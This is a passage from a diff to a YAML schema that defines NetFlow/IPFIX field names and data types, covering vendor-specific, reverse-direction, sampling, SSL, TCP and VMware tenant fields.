+ type: integer + + - name: netscaler_unknown353 + type: long + + - name: netscaler_unknown354 + type: long + + - name: netscaler_unknown355 + type: long + + - name: netscaler_unknown356 + type: long + + - name: netscaler_unknown357 + type: long + + - name: netscaler_unknown363 + type: short + + - name: netscaler_unknown383 + type: short + + - name: netscaler_unknown391 + type: long + + - name: netscaler_unknown398 + type: long + + - name: netscaler_unknown404 + type: long + + - name: netscaler_unknown405 + type: long + + - name: netscaler_unknown427 + type: long + + - name: netscaler_unknown429 + type: short + + - name: netscaler_unknown432 + type: short + + - name: netscaler_unknown433 + type: short + + - name: netscaler_unknown453 + type: long + + - name: netscaler_unknown465 + type: long + + - name: new_connection_delta_count + type: long + + - name: next_header_ipv6 + type: short + + - name: non_empty_packet_count + type: long + + - name: not_sent_flow_total_count + type: long + + - name: not_sent_layer2_octet_total_count + type: long + + - name: not_sent_octet_total_count + type: long + + - name: not_sent_packet_total_count + type: long + + - name: observation_domain_id + type: long + + - name: observation_domain_name + type: keyword + + - name: observation_point_id + type: long + + - name: observation_point_type + type: short + + - name: observation_time_microseconds + type: date + + - name: observation_time_milliseconds + type: date + + - name: observation_time_nanoseconds + type: date + + - name: observation_time_seconds + type: date + + - name: observed_flow_total_count + type: long + + - name: octet_delta_count + type: long + + - name: octet_delta_sum_of_squares + type: long + + - name: octet_total_count + type: long + + - name: octet_total_sum_of_squares + type: long + + - name: opaque_octets + type: short + + - name: original_exporter_ipv4_address + type: ip + + - name: original_exporter_ipv6_address + type: ip + + - name: original_flows_completed + type: long + + - name: original_flows_initiated + type: long + + - name: original_flows_present + type: long + + - name: original_observation_domain_id + type: long + + - name: os_finger_print + type: keyword + + - name: os_name + type: keyword + + - name: os_version + type: keyword + + - name: p2p_technology + type: keyword + + - name: packet_delta_count + type: long + + - name: packet_total_count + type: long + + - name: padding_octets + type: short + + - name: payload + type: keyword + + - name: payload_entropy + type: short + + - name: payload_length_ipv6 + type: integer + + - name: policy_qos_classification_hierarchy + type: long + + - name: policy_qos_queue_index + type: long + + - name: policy_qos_queuedrops + type: long + + - name: policy_qos_queueindex + type: long + + - name: port_id + type: long + + - name: port_range_end + type: integer + + - name: port_range_num_ports + type: integer + + - name: port_range_start + type: integer + + - name: port_range_step_size + type: integer + + - name: post_destination_mac_address + type: keyword + + - name: post_dot1q_customer_vlan_id + type: integer + + - name: post_dot1q_vlan_id + type: integer + + - name: post_ip_class_of_service + type: short + + - name: post_ip_diff_serv_code_point + type: short + + - name: post_ip_precedence + type: short + + - name: post_layer2_octet_delta_count + type: long + + - name: post_layer2_octet_total_count + type: long + + - name: post_mcast_layer2_octet_delta_count + type: long + + - name: post_mcast_layer2_octet_total_count + type: long + + - name: post_mcast_octet_delta_count + type: long + + - name: post_mcast_octet_total_count + type: long + + - name: post_mcast_packet_delta_count + type: long + + - name: post_mcast_packet_total_count + type: long + + - name: post_mpls_top_label_exp + type: short + + - name: post_napt_destination_transport_port + type: integer + + - name: post_napt_source_transport_port + type: integer + + - name: post_nat_destination_ipv4_address + type: ip + + - name: post_nat_destination_ipv6_address + type: ip + + - name: post_nat_source_ipv4_address + type: ip + + - name: post_nat_source_ipv6_address + type: ip + + - name: post_octet_delta_count + type: long + + - name: post_octet_total_count + type: long + + - name: post_packet_delta_count + type: long + + - name: post_packet_total_count + type: long + + - name: post_source_mac_address + type: keyword + + - name: post_vlan_id + type: integer + + - name: private_enterprise_number + type: long + + - name: procera_apn + type: keyword + + - name: procera_base_service + type: keyword + + - name: procera_content_categories + type: keyword + + - name: procera_device_id + type: long + + - name: procera_external_rtt + type: integer + + - name: procera_flow_behavior + type: keyword + + - name: procera_ggsn + type: keyword + + - name: procera_http_content_type + type: keyword + + - name: procera_http_file_length + type: long + + - name: procera_http_language + type: keyword + + - name: procera_http_location + type: keyword + + - name: procera_http_referer + type: keyword + + - name: procera_http_request_method + type: keyword + + - name: procera_http_request_version + type: keyword + + - name: procera_http_response_status + type: integer + + - name: procera_http_url + type: keyword + + - name: procera_http_user_agent + type: keyword + + - name: procera_imsi + type: long + + - name: procera_incoming_octets + type: long + + - name: procera_incoming_packets + type: long + + - name: procera_incoming_shaping_drops + type: long + + - name: procera_incoming_shaping_latency + type: integer + + - name: procera_internal_rtt + type: integer + + - name: procera_local_ipv4_host + type: ip + + - name: procera_local_ipv6_host + type: ip + + - name: procera_msisdn + type: long + + - name: procera_outgoing_octets + type: long + + - name: procera_outgoing_packets + type: long + + - name: procera_outgoing_shaping_drops + type: long + + - name: procera_outgoing_shaping_latency + type: integer + + - name: procera_property + type: keyword + + - name: procera_qoe_incoming_external + type: float + + - name: procera_qoe_incoming_internal + type: float + + - name: procera_qoe_outgoing_external + type: float + + - name: procera_qoe_outgoing_internal + type: float + + - name: procera_rat + type: keyword + + - name: procera_remote_ipv4_host + type: ip + + - name: procera_remote_ipv6_host + type: ip + + - name: procera_rnc + type: integer + + - name: procera_server_hostname + type: keyword + + - name: procera_service + type: keyword + + - name: procera_sgsn + type: keyword + + - name: procera_subscriber_identifier + type: keyword + + - name: procera_template_name + type: keyword + + - name: procera_user_location_information + type: keyword + + - name: protocol_identifier + type: short + + - name: pseudo_wire_control_word + type: long + + - name: pseudo_wire_destination_ipv4_address + type: ip + + - name: pseudo_wire_id + type: long + + - name: pseudo_wire_type + type: integer + + - name: reason + type: long + + - name: reason_text + type: keyword + + - name: relative_error + type: double + + - name: responder_octets + type: long + + - name: responder_packets + type: long + + - name: reverse_absolute_error + type: double + + - name: reverse_anonymization_flags + type: integer + + - name: reverse_anonymization_technique + type: integer + + - name: reverse_application_category_name + type: keyword + + - name: reverse_application_description + type: keyword + + - name: reverse_application_group_name + type: keyword + + - name: reverse_application_id + type: keyword + + - name: reverse_application_name + type: keyword + + - name: reverse_application_sub_category_name + type: keyword + + - name: reverse_average_interarrival_time + type: long + + - name: reverse_bgp_destination_as_number + type: long + + - name: reverse_bgp_next_adjacent_as_number + type: long + + - name: reverse_bgp_next_hop_ipv4_address + type: ip + + - name: reverse_bgp_next_hop_ipv6_address + type: ip + + - name: reverse_bgp_prev_adjacent_as_number + type: long + + - name: reverse_bgp_source_as_number + type: long + + - name: reverse_bgp_validity_state + type: short + + - name: reverse_class_id + type: short + + - name: reverse_class_name + type: keyword + + - name: reverse_classification_engine_id + type: short + + - name: reverse_collection_time_milliseconds + type: long + + - name: reverse_collector_certificate + type: keyword + + - name: reverse_confidence_level + type: double + + - name: reverse_connection_sum_duration_seconds + type: long + + - name: reverse_connection_transaction_id + type: long + + - name: reverse_data_byte_count + type: long + + - name: reverse_data_link_frame_section + type: keyword + + - name: reverse_data_link_frame_size + type: integer + + - name: reverse_data_link_frame_type + type: integer + + - name: reverse_data_records_reliability + type: short + + - name: reverse_delta_flow_count + type: long + + - name: reverse_destination_ipv4_address + type: ip + + - name: reverse_destination_ipv4_prefix + type: ip + + - name: reverse_destination_ipv4_prefix_length + type: short + + - name: reverse_destination_ipv6_address + type: ip + + - name: reverse_destination_ipv6_prefix + type: ip + + - name: reverse_destination_ipv6_prefix_length + type: short + + - name: reverse_destination_mac_address + type: keyword + + - name: reverse_destination_transport_port + type: integer + + - name: reverse_digest_hash_value + type: long + + - name: reverse_distinct_count_of_destination_ip_address + type: long + + - name: reverse_distinct_count_of_destination_ipv4_address + type: long + + - name: reverse_distinct_count_of_destination_ipv6_address + type: long + + - name: reverse_distinct_count_of_source_ip_address + type: long + + - name: reverse_distinct_count_of_source_ipv4_address + type: long + + - name: reverse_distinct_count_of_source_ipv6_address + type: long + + - name: reverse_dot1q_customer_dei + type: short + + - name: reverse_dot1q_customer_destination_mac_address + type: keyword + + - name: reverse_dot1q_customer_priority + type: short + + - name: reverse_dot1q_customer_source_mac_address + type: keyword + + - name: reverse_dot1q_customer_vlan_id + type: integer + + - name: reverse_dot1q_dei + type: short + + - name: reverse_dot1q_priority + type: short + + - name: reverse_dot1q_service_instance_id + type: long + + - name: reverse_dot1q_service_instance_priority + type: short + + - name: reverse_dot1q_service_instance_tag + type: keyword + + - name: reverse_dot1q_vlan_id + type: integer + + - name: reverse_dropped_layer2_octet_delta_count + type: long + + - name: reverse_dropped_layer2_octet_total_count + type: long + + - name: reverse_dropped_octet_delta_count + type: long + + - name: reverse_dropped_octet_total_count + type: long + + - name: reverse_dropped_packet_delta_count + type: long + + - name: reverse_dropped_packet_total_count + type: long + + - name: reverse_dst_traffic_index + type: long + + - name: reverse_egress_broadcast_packet_total_count + type: long + + - name: reverse_egress_interface + type: long + + - name: reverse_egress_interface_type + type: long + + - name: reverse_egress_physical_interface + type: long + + - name: reverse_egress_unicast_packet_total_count + type: long + + - name: reverse_egress_vrfid + type: long + + - name: reverse_encrypted_technology + type: keyword + + - name: reverse_engine_id + type: short + + - name: reverse_engine_type + type: short + + - name: reverse_ethernet_header_length + type: short + + - name: reverse_ethernet_payload_length + type: integer + + - name: reverse_ethernet_total_length + type: integer + + - name: reverse_ethernet_type + type: integer + + - name: reverse_export_sctp_stream_id + type: integer + + - name: reverse_exporter_certificate + type: keyword + + - name: reverse_exporting_process_id + type: long + + - name: reverse_firewall_event + type: short + + - name: reverse_first_non_empty_packet_size + type: integer + + - name: reverse_first_packet_banner + type: keyword + + - name: reverse_flags_and_sampler_id + type: long + + - name: reverse_flow_active_timeout + type: integer + + - name: reverse_flow_attributes + type: integer + + - name: reverse_flow_delta_milliseconds + type: long + + - name: reverse_flow_direction + type: short + + - name: reverse_flow_duration_microseconds + type: long + + - name: reverse_flow_duration_milliseconds + type: long + + - name: reverse_flow_end_delta_microseconds + type: long + + - name: reverse_flow_end_microseconds + type: long + + - name: reverse_flow_end_milliseconds + type: long + + - name: reverse_flow_end_nanoseconds + type: long + + - name: reverse_flow_end_reason + type: short + + - name: reverse_flow_end_seconds + type: long + + - name: reverse_flow_end_sys_up_time + type: long + + - name: reverse_flow_idle_timeout + type: integer + + - name: reverse_flow_label_ipv6 + type: long + + - name: reverse_flow_sampling_time_interval + type: long + + - name: reverse_flow_sampling_time_spacing + type: long + + - name: reverse_flow_selected_flow_delta_count + type: long + + - name: reverse_flow_selected_octet_delta_count + type: long + + - name: reverse_flow_selected_packet_delta_count + type: long + + - name: reverse_flow_selector_algorithm + type: integer + + - name: reverse_flow_start_delta_microseconds + type: long + + - name: reverse_flow_start_microseconds + type: long + + - name: reverse_flow_start_milliseconds + type: long + + - name: reverse_flow_start_nanoseconds + type: long + + - name: reverse_flow_start_seconds + type: long + + - name: reverse_flow_start_sys_up_time + type: long + + - name: reverse_forwarding_status + type: long + + - name: reverse_fragment_flags + type: short + + - name: reverse_fragment_identification + type: long + + - name: reverse_fragment_offset + type: integer + + - name: reverse_gre_key + type: long + + - name: reverse_hash_digest_output + type: short + + - name: reverse_hash_flow_domain + type: integer + + - name: reverse_hash_initialiser_value + type: long + + - name: reverse_hash_ip_payload_offset + type: long + + - name: reverse_hash_ip_payload_size + type: long + + - name: reverse_hash_output_range_max + type: long + + - name: reverse_hash_output_range_min + type: long + + - name: reverse_hash_selected_range_max + type: long + + - name: reverse_hash_selected_range_min + type: long + + - name: reverse_icmp_code_ipv4 + type: short + + - name: reverse_icmp_code_ipv6 + type: short + + - name: reverse_icmp_type_code_ipv4 + type: integer + + - name: reverse_icmp_type_code_ipv6 + type: integer + + - name: reverse_icmp_type_ipv4 + type: short + + - name: reverse_icmp_type_ipv6 + type: short + + - name: reverse_igmp_type + type: short + + - name: reverse_ignored_data_record_total_count + type: long + + - name: reverse_ignored_layer2_frame_total_count + type: long + + - name: reverse_ignored_layer2_octet_total_count + type: long + + - name: reverse_information_element_data_type + type: short + + - name: reverse_information_element_description + type: keyword + + - name: reverse_information_element_id + type: integer + + - name: reverse_information_element_index + type: integer + + - name: reverse_information_element_name + type: keyword + + - name: reverse_information_element_range_begin + type: long + + - name: reverse_information_element_range_end + type: long + + - name: reverse_information_element_semantics + type: short + + - name: reverse_information_element_units + type: integer + + - name: reverse_ingress_broadcast_packet_total_count + type: long + + - name: reverse_ingress_interface + type: long + + - name: reverse_ingress_interface_type + type: long + + - name: reverse_ingress_multicast_packet_total_count + type: long + + - name: reverse_ingress_physical_interface + type: long + + - name: reverse_ingress_unicast_packet_total_count + type: long + + - name: reverse_ingress_vrfid + type: long + + - name: reverse_initial_tcp_flags + type: short + + - name: reverse_initiator_octets + type: long + + - name: reverse_initiator_packets + type: long + + - name: reverse_interface_description + type: keyword + + - name: reverse_interface_name + type: keyword + + - name: reverse_intermediate_process_id + type: long + + - name: reverse_ip_class_of_service + type: short + + - name: reverse_ip_diff_serv_code_point + type: short + + - name: reverse_ip_header_length + type: short + + - name: reverse_ip_header_packet_section + type: keyword + + - name: reverse_ip_next_hop_ipv4_address + type: ip + + - name: reverse_ip_next_hop_ipv6_address + type: ip + + - name: reverse_ip_payload_length + type: long + + - name: reverse_ip_payload_packet_section + type: keyword + + - name: reverse_ip_precedence + type: short + + - name: reverse_ip_sec_spi + type: long + + - name: reverse_ip_total_length + type: long + + - name: reverse_ip_ttl + type: short + + - name: reverse_ip_version + type: short + + - name: reverse_ipv4_ihl + type: short + + - name: reverse_ipv4_options + type: long + + - name: reverse_ipv4_router_sc + type: ip + + - name: reverse_ipv6_extension_headers + type: long + + - name: reverse_is_multicast + type: short + + - name: reverse_large_packet_count + type: long + + - name: reverse_layer2_frame_delta_count + type: long + + - name: reverse_layer2_frame_total_count + type: long + + - name: reverse_layer2_octet_delta_count + type: long + + - name: reverse_layer2_octet_delta_sum_of_squares + type: long + + - name: reverse_layer2_octet_total_count + type: long + + - name: reverse_layer2_octet_total_sum_of_squares + type: long + + - name: reverse_layer2_segment_id + type: long + + - name: reverse_layer2packet_section_data + type: keyword + + - name: reverse_layer2packet_section_offset + type: integer + + - name: reverse_layer2packet_section_size + type: integer + + - name: reverse_line_card_id + type: long + + - name: reverse_lower_ci_limit + type: double + + - name: reverse_max_export_seconds + type: long + + - name: reverse_max_flow_end_microseconds + type: long + + - name: reverse_max_flow_end_milliseconds + type: long + + - name: reverse_max_flow_end_nanoseconds + type: long + + - name: reverse_max_flow_end_seconds + type: long + + - name: reverse_max_packet_size + type: integer + + - name: reverse_maximum_ip_total_length + type: long + + - name: reverse_maximum_layer2_total_length + type: long + + - name: reverse_maximum_ttl + type: short + + - name: reverse_message_md5_checksum + type: keyword + + - name: reverse_message_scope + type: short + + - name: reverse_metering_process_id + type: long + + - name: reverse_metro_evc_id + type: keyword + + - name: reverse_metro_evc_type + type: short + + - name: reverse_min_export_seconds + type: long + + - name: reverse_min_flow_start_microseconds + type: long + + - name: reverse_min_flow_start_milliseconds + type: long + + - name: reverse_min_flow_start_nanoseconds + type: long + + - name: reverse_min_flow_start_seconds + type: long + + - name: reverse_minimum_ip_total_length + type: long + + - name: reverse_minimum_layer2_total_length + type: long + + - name: reverse_minimum_ttl + type: short + + - name: reverse_monitoring_interval_end_milli_seconds + type: long + + - name: reverse_monitoring_interval_start_milli_seconds + type: long + + - name: reverse_mpls_label_stack_depth + type: long + + - name: reverse_mpls_label_stack_length + type: long + + - name: reverse_mpls_label_stack_section + type: keyword + + - name: reverse_mpls_label_stack_section10 + type: keyword + + - name: reverse_mpls_label_stack_section2 + type: keyword + + - name: reverse_mpls_label_stack_section3 + type: keyword + + - name: reverse_mpls_label_stack_section4 + type: keyword + + - name: reverse_mpls_label_stack_section5 + type: keyword + + - name: reverse_mpls_label_stack_section6 + type: keyword + + - name: reverse_mpls_label_stack_section7 + type: keyword + + - name: reverse_mpls_label_stack_section8 + type: keyword + + - name: reverse_mpls_label_stack_section9 + type: keyword + + - name: reverse_mpls_payload_length + type: long + + - name: reverse_mpls_payload_packet_section + type: keyword + + - name: reverse_mpls_top_label_exp + type: short + + - name: reverse_mpls_top_label_ipv4_address + type: ip + + - name: reverse_mpls_top_label_ipv6_address + type: ip + + - name: reverse_mpls_top_label_prefix_length + type: short + + - name: reverse_mpls_top_label_stack_section + type: keyword + + - name: reverse_mpls_top_label_ttl + type: short + + - name: reverse_mpls_top_label_type + type: short + + - name: reverse_mpls_vpn_route_distinguisher + type: keyword + + - name: reverse_multicast_replication_factor + type: long + + - name: reverse_nat_event + type: short + + - name: reverse_nat_originating_address_realm + type: short + + - name: reverse_nat_pool_id + type: long + + - name: reverse_nat_pool_name + type: keyword + + - name: reverse_nat_type + type: short + + - name: reverse_new_connection_delta_count + type: long + + - name: reverse_next_header_ipv6 + type: short + + - name: reverse_non_empty_packet_count + type: long + + - name: reverse_not_sent_layer2_octet_total_count + type: long + + - name: reverse_observation_domain_name + type: keyword + + - name: reverse_observation_point_id + type: long + + - name: reverse_observation_point_type + type: short + + - name: reverse_observation_time_microseconds + type: long + + - name: reverse_observation_time_milliseconds + type: long + + - name: reverse_observation_time_nanoseconds + type: long + + - name: reverse_observation_time_seconds + type: long + + - name: reverse_octet_delta_count + type: long + + - name: reverse_octet_delta_sum_of_squares + type: long + + - name: reverse_octet_total_count + type: long + + - name: reverse_octet_total_sum_of_squares + type: long + + - name: reverse_opaque_octets + type: keyword + + - name: reverse_original_exporter_ipv4_address + type: ip + + - name: reverse_original_exporter_ipv6_address + type: ip + + - name: reverse_original_flows_completed + type: long + + - name: reverse_original_flows_initiated + type: long + + - name: reverse_original_flows_present + type: long + + - name: reverse_original_observation_domain_id + type: long + + - name: reverse_os_finger_print + type: keyword + + - name: reverse_os_name + type: keyword + + - name: reverse_os_version + type: keyword + + - name: reverse_p2p_technology + type: keyword + + - name: reverse_packet_delta_count + type: long + + - name: reverse_packet_total_count + type: long + + - name: reverse_payload + type: keyword + + - name: reverse_payload_entropy + type: short + + - name: reverse_payload_length_ipv6 + type: integer + + - name: reverse_port_id + type: long + + - name: reverse_port_range_end + type: integer + + - name: reverse_port_range_num_ports + type: integer + + - name: reverse_port_range_start + type: integer + + - name: reverse_port_range_step_size + type: integer + + - name: reverse_post_destination_mac_address + type: keyword + + - name: reverse_post_dot1q_customer_vlan_id + type: integer + + - name: reverse_post_dot1q_vlan_id + type: integer + + - name: reverse_post_ip_class_of_service + type: short + + - name: reverse_post_ip_diff_serv_code_point + type: short + + - name: reverse_post_ip_precedence + type: short + + - name: reverse_post_layer2_octet_delta_count + type: long + + - name: reverse_post_layer2_octet_total_count + type: long + + - name: reverse_post_mcast_layer2_octet_delta_count + type: long + + - name: reverse_post_mcast_layer2_octet_total_count + type: long + + - name: reverse_post_mcast_octet_delta_count + type: long + + - name: reverse_post_mcast_octet_total_count + type: long + + - name: reverse_post_mcast_packet_delta_count + type: long + + - name: reverse_post_mcast_packet_total_count + type: long + + - name: reverse_post_mpls_top_label_exp + type: short + + - name: reverse_post_napt_destination_transport_port + type: integer + + - name: reverse_post_napt_source_transport_port + type: integer + + - name: reverse_post_nat_destination_ipv4_address + type: ip + + - name: reverse_post_nat_destination_ipv6_address + type: ip + + - name: reverse_post_nat_source_ipv4_address + type: ip + + - name: reverse_post_nat_source_ipv6_address + type: ip + + - name: reverse_post_octet_delta_count + type: long + + - name: reverse_post_octet_total_count + type: long + + - name: reverse_post_packet_delta_count + type: long + + - name: reverse_post_packet_total_count + type: long + + - name: reverse_post_source_mac_address + type: keyword + + - name: reverse_post_vlan_id + type: integer + + - name: reverse_private_enterprise_number + type: long + + - name: reverse_protocol_identifier + type: short + + - name: reverse_pseudo_wire_control_word + type: long + + - name: reverse_pseudo_wire_destination_ipv4_address + type: ip + + - name: reverse_pseudo_wire_id + type: long + + - name: reverse_pseudo_wire_type + type: integer + + - name: reverse_relative_error + type: double + + - name: reverse_responder_octets + type: long + + - name: reverse_responder_packets + type: long + + - name: reverse_rfc3550_jitter_microseconds + type: long + + - name: reverse_rfc3550_jitter_milliseconds + type: long + + - name: reverse_rfc3550_jitter_nanoseconds + type: long + + - name: reverse_rtp_payload_type + type: short + + - name: reverse_rtp_sequence_number + type: integer + + - name: reverse_sampler_id + type: short + + - name: reverse_sampler_mode + type: short + + - name: reverse_sampler_name + type: keyword + + - name: reverse_sampler_random_interval + type: long + + - name: reverse_sampling_algorithm + type: short + + - name: reverse_sampling_flow_interval + type: long + + - name: reverse_sampling_flow_spacing + type: long + + - name: reverse_sampling_interval + type: long + + - name: reverse_sampling_packet_interval + type: long + + - name: reverse_sampling_packet_space + type: long + + - name: reverse_sampling_population + type: long + + - name: reverse_sampling_probability + type: double + + - name: reverse_sampling_size + type: long + + - name: reverse_sampling_time_interval + type: long + + - name: reverse_sampling_time_space + type: long + + - name: reverse_second_packet_banner + type: keyword + + - name: reverse_section_exported_octets + type: integer + + - name: reverse_section_offset + type: integer + + - name: reverse_selection_sequence_id + type: long + + - name: reverse_selector_algorithm + type: integer + + - name: reverse_selector_id + type: long + + - name: reverse_selector_id_total_flows_observed + type: long + + - name: reverse_selector_id_total_flows_selected + type: long + + - name: reverse_selector_id_total_pkts_observed + type: long + + - name: reverse_selector_id_total_pkts_selected + type: long + + - name: reverse_selector_name + type: keyword + + - name: reverse_session_scope + type: short + + - name: reverse_small_packet_count + type: long + + - name: reverse_source_ipv4_address + type: ip + + - name: reverse_source_ipv4_prefix + type: ip + + - name: reverse_source_ipv4_prefix_length + type: short + + - name: reverse_source_ipv6_address + type: ip + + - name: reverse_source_ipv6_prefix + type: ip + + - name: reverse_source_ipv6_prefix_length + type: short + + - name: reverse_source_mac_address + type: keyword + + - name: reverse_source_transport_port + type: integer + + - name: reverse_src_traffic_index + type: long + + - name: reverse_sta_ipv4_address + type: ip + + - name: reverse_sta_mac_address + type: keyword + + - name: reverse_standard_deviation_interarrival_time + type: long + + - name: reverse_standard_deviation_payload_length + type: integer + + - name: reverse_system_init_time_milliseconds + type: long + + - name: reverse_tcp_ack_total_count + type: long + + - name: reverse_tcp_acknowledgement_number + type: long + + - name: reverse_tcp_control_bits + type: integer + + - name: reverse_tcp_destination_port + type: integer + + - name: reverse_tcp_fin_total_count + type: long + + - name: reverse_tcp_header_length + type: short + + - name: reverse_tcp_options + type: long + + - name: reverse_tcp_psh_total_count + type: long + + - name: reverse_tcp_rst_total_count + type: long + + - name: reverse_tcp_sequence_number + type: long + + - name: reverse_tcp_source_port + type: integer + + - name: reverse_tcp_syn_total_count + type: long + + - name: reverse_tcp_urg_total_count + type: long + + - name: reverse_tcp_urgent_pointer + type: integer + + - name: reverse_tcp_window_scale + type: integer + + - name: reverse_tcp_window_size + type: integer + + - name: reverse_total_length_ipv4 + type: integer + + - name: reverse_transport_octet_delta_count + type: long + + - name: reverse_transport_packet_delta_count + type: long + + - name: reverse_tunnel_technology + type: keyword + + - name: reverse_udp_destination_port + type: integer + + - name: reverse_udp_message_length + type: integer + + - name: reverse_udp_source_port + type: integer + + - name: reverse_union_tcp_flags + type: short + + - name: reverse_upper_ci_limit + type: double + + - name: reverse_user_name + type: keyword + + - name: reverse_value_distribution_method + type: short + + - name: reverse_virtual_station_interface_id + type: keyword + + - name: reverse_virtual_station_interface_name + type: keyword + + - name: reverse_virtual_station_name + type: keyword + + - name: reverse_virtual_station_uuid + type: keyword + + - name: reverse_vlan_id + type: integer + + - name: reverse_vr_fname + type: keyword + + - name: reverse_wlan_channel_id + type: short + + - name: reverse_wlan_ssid + type: keyword + + - name: reverse_wtp_mac_address + type: keyword + + - name: rfc3550_jitter_microseconds + type: long + + - name: rfc3550_jitter_milliseconds + type: long + + - name: rfc3550_jitter_nanoseconds + type: long + + - name: rtp_payload_type + type: short + + - name: rtp_sequence_number + type: integer + + - name: sampler_id + type: short + + - name: sampler_mode + type: short + + - name: sampler_name + type: keyword + + - name: sampler_random_interval type: long + - name: sampling_algorithm + type: short + - name: sampling_flow_interval type: long - name: sampling_flow_spacing type: long - - name: flow_sampling_time_interval + - name: sampling_interval type: long - - name: flow_sampling_time_spacing + - name: sampling_packet_interval + type: long + + - name: sampling_packet_space + type: long + + - name: sampling_population + type: long + + - name: sampling_probability + type: double + + - name: sampling_size + type: long + + - name: sampling_time_interval + type: long + + - name: sampling_time_space + type: long + + - name: second_packet_banner + type: keyword + + - name: section_exported_octets + type: integer + + - name: section_offset + type: integer + + - name: selection_sequence_id + type: long + + - name: selector_algorithm + type: integer + + - name: selector_id + type: long + + - name: selector_id_total_flows_observed + type: long + + - name: selector_id_total_flows_selected + type: long + + - name: selector_id_total_pkts_observed type: long - - name: hash_flow_domain + - name: selector_id_total_pkts_selected + type: long + + - name: selector_name + type: keyword + + - name: service_name + type: keyword + + - name: session_scope + type: short + + - name: silk_app_label type: integer - - name: transport_octet_delta_count + - name: small_packet_count type: long - - name: transport_packet_delta_count - type: long + - name: source_ipv4_address + type: ip - - name: original_exporter_ipv4_address + - name: source_ipv4_prefix type: ip - - name: original_exporter_ipv6_address + - name: source_ipv4_prefix_length + type: short + + - name: source_ipv6_address type: ip - - name: original_observation_domain_id - type: long + - name: source_ipv6_prefix + type: ip - - name: intermediate_process_id - type: long + - name: source_ipv6_prefix_length + type: short - - name: ignored_data_record_total_count - type: long + - name: source_mac_address + type: keyword - - name: data_link_frame_type + - name: source_transport_port type: integer - - name: section_offset + - name: source_transport_ports_limit type: integer - - name: section_exported_octets - type: integer + - name: src_traffic_index + type: long - - name: dot1q_service_instance_tag - type: short + - name: ssl_cert_serial_number + type: keyword - - name: dot1q_service_instance_id - type: long + - name: ssl_cert_signature + type: keyword - - name: dot1q_service_instance_priority + - name: ssl_cert_validity_not_after + type: keyword + + - name: ssl_cert_validity_not_before + type: keyword + + - name: ssl_cert_version type: short - - name: dot1q_customer_source_mac_address + - name: ssl_certificate_hash type: keyword - - name: dot1q_customer_destination_mac_address + - name: ssl_cipher type: keyword - - name: post_layer2_octet_delta_count - type: long + - name: ssl_client_version + type: short - - name: post_mcast_layer2_octet_delta_count - type: long + - name: ssl_compression_method + type: short - - name: post_layer2_octet_total_count - type: long + - name: ssl_object_type + type: keyword - - name: post_mcast_layer2_octet_total_count - type: long + - name: ssl_object_value + type: keyword - - name: minimum_layer2_total_length - type: long + - name: ssl_public_key_algorithm + type: keyword - - name: maximum_layer2_total_length - type: long + - name: ssl_public_key_length + type: keyword - - name: dropped_layer2_octet_delta_count + - name: ssl_server_cipher type: long - - name: dropped_layer2_octet_total_count - type: long + - name: ssl_server_name + type: keyword - - name: ignored_layer2_octet_total_count - type: long + - name: sta_ipv4_address + type: ip - - name: not_sent_layer2_octet_total_count - type: long + - name: sta_mac_address + type: keyword - - name: layer2_octet_delta_sum_of_squares + - name: standard_deviation_interarrival_time type: long - - name: layer2_octet_total_sum_of_squares - type: long + - name: standard_deviation_payload_length + type: short - - name: layer2_frame_delta_count - type: long + - name: system_init_time_milliseconds + type: date - - name: layer2_frame_total_count + - name: tcp_ack_total_count type: long - - name: pseudo_wire_destination_ipv4_address - type: ip - - - name: ignored_layer2_frame_total_count + - name: tcp_acknowledgement_number type: long - - name: mib_object_value_integer + - name: tcp_control_bits type: integer - - name: mib_object_value_octet_string - type: short + - name: tcp_destination_port + type: integer - - name: mib_object_value_oid - type: short + - name: tcp_fin_total_count + type: long - - name: mib_object_value_bits + - name: tcp_header_length type: short - - name: mib_object_value_ip_address - type: ip - - - name: mib_object_value_counter + - name: tcp_options type: long - - name: mib_object_value_gauge + - name: tcp_psh_total_count type: long - - name: mib_object_value_time_ticks + - name: tcp_rst_total_count type: long - - name: mib_object_value_unsigned + - name: tcp_sequence_number type: long - - name: mib_object_identifier - type: short + - name: tcp_source_port + type: integer - - name: mib_sub_identifier + - name: tcp_syn_total_count type: long - - name: mib_index_indicator + - name: tcp_urg_total_count type: long - - name: mib_capture_time_semantics - type: short + - name: tcp_urgent_pointer + type: integer - - name: mib_context_engine_id - type: short + - name: tcp_window_scale + type: integer - - name: mib_context_name - type: keyword + - name: tcp_window_size + type: integer - - name: mib_object_name - type: keyword + - name: template_id + type: integer - - name: mib_object_description + - name: tftp_filename type: keyword - - name: mib_object_syntax + - name: tftp_mode type: keyword - - name: mib_module_name - type: keyword + - name: timestamp + type: long - - name: mobile_imsi - type: keyword + - name: timestamp_absolute_monitoring-interval + type: long - - name: mobile_msisdn + - name: total_length_ipv4 + type: integer + + - name: traffic_type + type: short + + - name: transport_octet_delta_count + type: long + + - name: transport_packet_delta_count + type: long + + - name: tunnel_technology type: keyword - - name: http_status_code + - name: udp_destination_port type: integer - - name: source_transport_ports_limit + - name: udp_message_length type: integer - - name: http_request_method - type: keyword + - name: udp_source_port + type: integer - - name: http_request_host - type: keyword + - name: union_tcp_flags + type: short - - name: http_request_target - type: keyword + - name: upper_ci_limit + type: double - - name: http_message_version + - name: user_name type: keyword - - name: nat_instance_id - type: long - - - name: internal_address_realm - type: short + - name: username + type: keyword - - name: external_address_realm + - name: value_distribution_method type: short - - name: nat_quota_exceeded_event + - name: viptela_vpn_id type: long - - name: nat_threshold_event - type: long + - name: virtual_station_interface_id + type: short - - name: http_user_agent + - name: virtual_station_interface_name type: keyword - - name: http_content_type + - name: virtual_station_name type: keyword - - name: http_reason_phrase - type: keyword + - name: virtual_station_uuid + type: short - - name: max_session_entries - type: long + - name: vlan_id + type: integer - - name: max_bib_entries - type: long + - name: vmware_egress_interface_attr + type: integer - - name: max_entries_per_user - type: long + - name: vmware_ingress_interface_attr + type: integer - - name: max_subscribers - type: long + - name: vmware_tenant_dest_ipv4 + type: ip - - name: max_fragments_pending_reassembly - type: long + - name: vmware_tenant_dest_ipv6 + type: ip - - name: address_pool_high_threshold - type: long + - name: vmware_tenant_dest_port + type: integer - - name: address_pool_low_threshold - type: long + - name: vmware_tenant_protocol + type: short - - name: address_port_mapping_high_threshold - type: long + - name: vmware_tenant_source_ipv4 + type: ip - - name: address_port_mapping_low_threshold - type: long + - name: vmware_tenant_source_ipv6 + type: ip - - name: address_port_mapping_per_user_high_threshold - type: long + - name: vmware_tenant_source_port + type: integer - - name: global_address_mapping_high_threshold - type: long + - name: vmware_vxlan_export_role + type: 